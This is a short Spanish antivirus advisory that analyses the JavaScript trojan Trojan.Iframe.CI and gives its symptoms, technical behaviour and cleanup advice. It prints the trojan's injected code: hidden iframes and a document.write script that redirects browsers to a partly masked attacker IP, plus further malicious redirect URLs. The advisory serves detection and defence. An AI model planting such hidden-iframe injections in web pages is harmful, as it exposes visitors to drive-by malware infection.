Trojan.Iframe.CI

( Trojan-Clicker.JS.Agent.h, TrojanDownloader:JS/Psyme.gen )

SINTOMAS:

Puede detectarse cuando accede a páginas web sospechosas.

DESCRIPCIÓN TÉCNICA:

Este malware es un JavaScript malicioso, que puede descargarse de forma inconsciente cuando el usuario visita páginas web infectadas. Contiene código para crear un iframe oculto:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>

Y un código cifrado que apunta a:
<SCRIPT>window.status='Done';document.write('<iframe name=[num_aleatorio] src=\'http://77.221.133.X/.if/go.html?'+Math.round(Math.random()*[num_aleatorio])+'[num_aleatorio]\' width=303 height=93 style=\'display: none\'></iframe>')</SCRIPT>

Redirigiendo al navegador web a la siguiente página web:

"http://77.221.133.X/.if/go.html?[ num_aleatorio]", una dirección IP hospedada en Rusia ([eliminado]atapoint.ru).

Al llegar a esta página, el usuario puede resultar infectado por otros malware y ser redirigido a páginas como:

http://77.221.133.X/.dif/go.php?sid=1
http://77.221.133.X/.sp/in.cgi?p=o

que a su vez, también contienen iframes ocultos:

<iframe src="http://77.221.133.X/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>.

INSTRUCCIONES DE LIMPIEZA:

Analice sus archivos con BitDefender para desinfectarlos.

ANALIZADO POR:

Dan Anton, investigador de virus